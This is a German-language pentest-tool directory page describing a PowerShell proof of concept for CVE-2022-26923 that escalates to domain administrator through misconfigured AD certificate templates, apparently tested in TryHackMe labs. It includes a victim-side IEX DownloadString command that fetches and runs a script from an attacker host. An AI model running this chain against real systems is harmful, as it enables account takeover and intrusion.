Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-26923-Powershell-POC — Ein PowerShell-PoC zum Laden und automatischen Ausführen von Certify und Rubeus aus dem Speicher. | Kitploit
Tools/GitHubGitHub/lsecqt/cve-2022-26923-powershell-poc
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHublsecqt/cve-2022-26923-powershell-poc

CVE-2022-26923-Powershell-POC

Ein PowerShell-PoC zum Laden und automatischen Ausführen von Certify und Rubeus aus dem Speicher.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
178vor 4 JahrenNoch nicht geprüft

CVE-2022-26923-Powershell-POC

Ein PowerShell-PoC, um Certify und Rubeus aus dem Speicher zu laden und automatisch auszuführen.

Wie funktioniert es?

  1. Lädt Certify.exe und Rubeus.exe in den Speicher.
  2. Scannt das Zielgerät auf falsch konfigurierte Zertifikatsvorlagen. (Mehr unter https://www.youtube.com/watch?v=HBRCI5O35R8)
  3. Fordert ein Zertifikat für den administrativen Benutzer an, basierend auf der anfälligen Vorlage.
  4. Sendet das Zertifikat an den Zertifikatshandler, dieser übersetzt es in das .pfx-Format und sendet es zurück an den Client.
  5. Nutzt Rubeus, um das Zertifikat zu laden und ein Ticket für den administrativen Benutzer zu generieren.
  6. Ändert das Passwort des administrativen Benutzers. (Nur für die Demo)

Das PoC wurde in den folgenden TryHackMe-Labs getestet: https://tryhackme.com/room/adcertificatetemplates

Diese CVE wird zur Privilegienausweitung verwendet, daher wird in dieser Demo keine anfängliche Ausnutzung behandelt, noch das THM-Lab.

Schritte:

  1. python3 -m http.server 80 [Attacker Box]
  2. python3 uploader.py 8000 [Attacker Box]
  3. IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [Victim Box]

Hinweis: Dieses PoC dient nur zu Bildungszwecken. Sie sind für Ihre eigenen Handlungen verantwortlich.

Tool herunterladen